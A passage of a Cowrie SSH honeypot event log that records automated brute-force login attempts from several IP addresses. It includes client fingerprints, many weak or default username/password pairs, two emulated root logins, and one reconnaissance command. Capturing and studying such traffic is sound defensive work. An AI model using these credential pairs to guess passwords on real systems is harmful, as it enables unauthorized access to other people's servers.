com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:54:50.695696Z","src_ip":"212.227.235.229","session":"e33d46fa2c5f"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:51.459432Z","src_ip":"212.227.235.229","session":"e33d46fa2c5f"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:51.897590Z","src_ip":"212.227.235.229","session":"06fa69f27ae6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:52.715554Z","src_ip":"212.227.235.229","session":"e33d46fa2c5f"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52638,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f14a2c4ff48","protocol":"ssh","message":"New connection: 41.226.27.251:52638 (1.2.3.4:22) [session: 8f14a2c4ff48]","sensor":"my-vps","timestamp":"2025-08-31T02:54:53.141789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:54:53.173376Z","src_ip":"41.226.27.251","session":"8f14a2c4ff48"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:54:53.189569Z","src_ip":"41.226.27.251","session":"8f14a2c4ff48"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:53.359465Z","src_ip":"41.226.27.251","session":"8f14a2c4ff48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59640,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4c9d258db03","protocol":"ssh","message":"New connection: 212.227.125.160:59640 (1.2.3.4:22) [session: a4c9d258db03]","sensor":"my-vps","timestamp":"2025-08-31T02:54:54.578209Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:54.631077Z","src_ip":"41.226.27.251","session":"8f14a2c4ff48"}
{"eventid":"cowrie.session.closed","duration":"63.6","message":"Connection lost after 63.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:08.432507Z","src_ip":"212.227.235.229","session":"06fa69f27ae6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:10.695337Z","src_ip":"212.227.125.160","session":"a4c9d258db03"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:55:10.697928Z","src_ip":"212.227.125.160","session":"a4c9d258db03"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":33306,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d49e401c537","protocol":"ssh","message":"New connection: 41.226.27.251:33306 (1.2.3.4:22) [session: 0d49e401c537]","sensor":"my-vps","timestamp":"2025-08-31T02:55:13.316286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:13.317155Z","src_ip":"41.226.27.251","session":"0d49e401c537"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:55:13.360540Z","src_ip":"41.226.27.251","session":"0d49e401c537"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-31T02:55:13.490839Z","src_ip":"41.226.27.251","session":"0d49e401c537"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:14.759801Z","src_ip":"41.226.27.251","session":"0d49e401c537"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47908,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef2626a886ce","protocol":"ssh","message":"New connection: 212.227.235.229:47908 (1.2.3.4:22) [session: ef2626a886ce]","sensor":"my-vps","timestamp":"2025-08-31T02:55:18.283594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:19.071413Z","src_ip":"212.227.235.229","session":"ef2626a886ce"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:55:19.072193Z","src_ip":"212.227.235.229","session":"ef2626a886ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52250,"dst_ip":"1.2.3.4","dst_port":22,"session":"d58ee74ef39c","protocol":"ssh","message":"New connection: 212.227.235.229:52250 (1.2.3.4:22) [session: d58ee74ef39c]","sensor":"my-vps","timestamp":"2025-08-31T02:55:19.605932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:19.606928Z","src_ip":"212.227.235.229","session":"d58ee74ef39c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:55:19.854429Z","src_ip":"212.227.235.229","session":"d58ee74ef39c"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:55:20.846882Z","src_ip":"212.227.235.229","session":"d58ee74ef39c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:22.097273Z","src_ip":"212.227.235.229","session":"d58ee74ef39c"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"abc123","message":"login attempt [ftptest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:55:25.150326Z","src_ip":"212.227.235.229","session":"ef2626a886ce"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:26.886329Z","src_ip":"212.227.235.229","session":"ef2626a886ce"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60646,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff065684570c","protocol":"ssh","message":"New connection: 41.226.27.251:60646 (1.2.3.4:22) [session: ff065684570c]","sensor":"my-vps","timestamp":"2025-08-31T02:55:33.471593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:33.472499Z","src_ip":"41.226.27.251","session":"ff065684570c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:55:33.516778Z","src_ip":"41.226.27.251","session":"ff065684570c"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:55:33.650487Z","src_ip":"41.226.27.251","session":"ff065684570c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:55:33.759950Z","src_ip":"41.226.27.251","session":"ff065684570c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:55:33.760653Z","src_ip":"41.226.27.251","session":"ff065684570c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:33.806127Z","src_ip":"41.226.27.251","session":"ff065684570c"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:33.807229Z","src_ip":"41.226.27.251","session":"ff065684570c"}
{"eventid":"cowrie.session.connect","src_ip":"140.206.195.57","src_port":1765,"dst_ip":"1.2.3.4","dst_port":22,"session":"13368434dd66","protocol":"ssh","message":"New connection: 140.206.195.57:1765 (1.2.3.4:22) [session: 13368434dd66]","sensor":"my-vps","timestamp":"2025-08-31T02:55:36.449117Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.245.85.21","src_port":46993,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6b26e35ac5b","protocol":"ssh","message":"New connection: 123.245.85.21:46993 (1.2.3.4:22) [session: a6b26e35ac5b]","sensor":"my-vps","timestamp":"2025-08-31T02:55:37.058071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:37.059030Z","src_ip":"123.245.85.21","session":"a6b26e35ac5b"}
{"eventid":"cowrie.client.kex","hassh":"2aec6b44b06bec95d73f66b5d30cb69a","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a","sensor":"my-vps","timestamp":"2025-08-31T02:55:37.291702Z","src_ip":"123.245.85.21","session":"a6b26e35ac5b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:37.513139Z","src_ip":"140.206.195.57","session":"13368434dd66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38562,"dst_ip":"1.2.3.4","dst_port":22,"session":"861e76bad577","protocol":"ssh","message":"New connection: 212.227.125.160:38562 (1.2.3.4:22) [session: 861e76bad577]","sensor":"my-vps","timestamp":"2025-08-31T02:55:40.177922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:40.697189Z","src_ip":"212.227.125.160","session":"861e76bad577"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:55:40.698973Z","src_ip":"212.227.125.160","session":"861e76bad577"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:55:40.924208Z","src_ip":"212.227.125.160","session":"a4c9d258db03"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"abc123","message":"login attempt [ftptest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:55:43.354302Z","src_ip":"212.227.125.160","session":"861e76bad577"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58850,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fb8f11806ca","protocol":"ssh","message":"New connection: 217.72.205.35:58850 (1.2.3.4:22) [session: 7fb8f11806ca]","sensor":"my-vps","timestamp":"2025-08-31T02:55:44.636586Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:44.637655Z","src_ip":"217.72.205.35","session":"7fb8f11806ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59482,"dst_ip":"1.2.3.4","dst_port":22,"session":"98e26cabc40f","protocol":"ssh","message":"New connection: 212.227.235.229:59482 (1.2.3.4:22) [session: 98e26cabc40f]","sensor":"my-vps","timestamp":"2025-08-31T02:55:45.419624Z"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:45.973519Z","src_ip":"212.227.125.160","session":"861e76bad577"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60790,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ac94c318cb9","protocol":"ssh","message":"New connection: 212.227.235.229:60790 (1.2.3.4:22) [session: 0ac94c318cb9]","sensor":"my-vps","timestamp":"2025-08-31T02:55:48.924391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:48.925315Z","src_ip":"212.227.235.229","session":"0ac94c318cb9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:55:49.173402Z","src_ip":"212.227.235.229","session":"0ac94c318cb9"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:55:49.920296Z","src_ip":"212.227.235.229","session":"0ac94c318cb9"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:51.170901Z","src_ip":"212.227.235.229","session":"0ac94c318cb9"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:52.058327Z","src_ip":"123.245.85.21","session":"a6b26e35ac5b"}
